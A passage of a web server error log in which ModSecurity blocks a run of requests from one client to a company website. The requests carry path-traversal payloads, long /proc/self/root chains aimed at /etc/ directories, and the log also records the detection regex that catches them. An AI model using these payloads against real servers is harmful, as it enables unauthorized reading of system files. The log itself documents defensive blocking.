"abgnwHjZBu2q05ozVU9YVwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:41.538071 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:33350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnwf9ocpUE4ed4uDzvvwAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:42.867045 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:33364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnwv9ocpUE4ed4uDzvwQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:44.203124 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:33368] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnxAlT9VtDQc7bgUyy2QAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:46.461657 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:33376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnxv9ocpUE4ed4uDzvxAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:47.784975 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:33390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnx_9ocpUE4ed4uDzvxQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:49.103162 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:33396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnybysWC90G-1nBrBGTQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:50.323390 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:53742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnyhXjF1vJNtV6CWr2-gAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:51.677526 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:53756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgny5qj1wV0Si-Okefu1QAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:52.929832 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:53768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnzBXjF1vJNtV6CWr2_AAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:54.217365 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:53776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnznjZBu2q05ozVU9YWQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:55.583213 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:53778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnz9SswJuvopo3lOhf0wAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:57.747420 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:53784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn0Y6lpbStxTqkSkttHwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:59.087256 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.243.203:53786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn0wlT9VtDQc7bgUyy6wAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:00.339347 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:33536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn1BXjF1vJNtV6CWr2_wAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:01.584675 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:33542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn1bABkC4fWIHEf8Hr8gAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:05.436595 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:33552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn2RXjF1vJNtV6CWr3CAAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:06.971359 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:33564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn2rysWC90G-1nBrBGUAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:55:13.487429 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:33566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn4bABkC4fWIHEf8Hr-QAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:17.123483 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:51796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn5Y6lpbStxTqkSkttKwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:19.610003 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:51798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn5nbQATo66fKoS7xQfwAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:55:38.840114 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:43970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgn-nbQATo66fKoS7xQpwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
